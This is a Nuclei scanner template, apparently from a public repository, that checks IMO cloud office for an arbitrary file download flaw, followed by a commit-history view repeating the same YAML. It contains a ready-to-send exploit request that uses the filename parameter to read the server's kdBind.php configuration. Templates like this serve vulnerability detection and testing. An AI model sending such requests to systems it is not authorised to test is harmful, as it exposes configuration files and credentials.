nuclei-templates/http/vulnerabilities/imo/imo-file-download.yaml

id: imo-file-download

info:
  name: IMO - Arbitrary File Download
  author: ritikchaddha
  severity: high
  description: |
    The imo cloud office can read system sensitive files because the filename parameter of the /file/Placard/upload/Imo_DownLoadUI.php page is not strictly filtered.
  reference:
    - https://forum.butian.net/article/214
  metadata:
    max-request: 2
  tags: imo,file-download

http:
  - raw:
      - |
        GET /file/Placard/upload/Imo_DownLoadUI.php?cid=1&uid=1&type=1&filename=/OpenPlatform/config/kdBind.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<?php'
          - '$bindInfo = array'
        condition: and

      - type: word
        part: header
        words:
          - "application/octet-stream"
          - "filename=/home/www"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201b86d77189abbf7753dc11efc184773bb801748d35690eb5e944ec0e0e02d4a8022100fb647fda7a6ea221c69333cb18511c175900c4e25c3e6aca23e81437c1e5959f:922c64590222798bb761d5b6d8e72950
Create imo-file-download.yaml 2024-09-09 09:33:22 +00:00			`id: imo-file-download`

			`info:`
			`name: IMO - Arbitrary File Download`
			`author: ritikchaddha`
			`severity: high`
			`description: \|`
			`The imo cloud office can read system sensitive files because the filename parameter of the /file/Placard/upload/Imo_DownLoadUI.php page is not strictly filtered.`
			`reference:`
			`- https://forum.butian.net/article/214`
			`metadata:`
			`max-request: 2`
			`tags: imo,file-download`

			`http:`
			`- raw:`
			`- \|`
			`GET /file/Placard/upload/Imo_DownLoadUI.php?cid=1&uid=1&type=1&filename=/OpenPlatform/config/kdBind.php HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- '<?php'`
			`- '$bindInfo = array'`
			`condition: and`

			`- type: word`
			`part: header`
			`words:`
			`- "application/octet-stream"`
			`- "filename=/home/www"`
			`condition: and`

			`- type: status`
			`status:`
			`- 200`
chore: sign templates 🤖 2024-09-10 06:37:34 +00:00			`# digest: 4a0a0047304502201b86d77189abbf7753dc11efc184773bb801748d35690eb5e944ec0e0e02d4a8022100fb647fda7a6ea221c69333cb18511c175900c4e25c3e6aca23e81437c1e5959f:922c64590222798bb761d5b6d8e72950`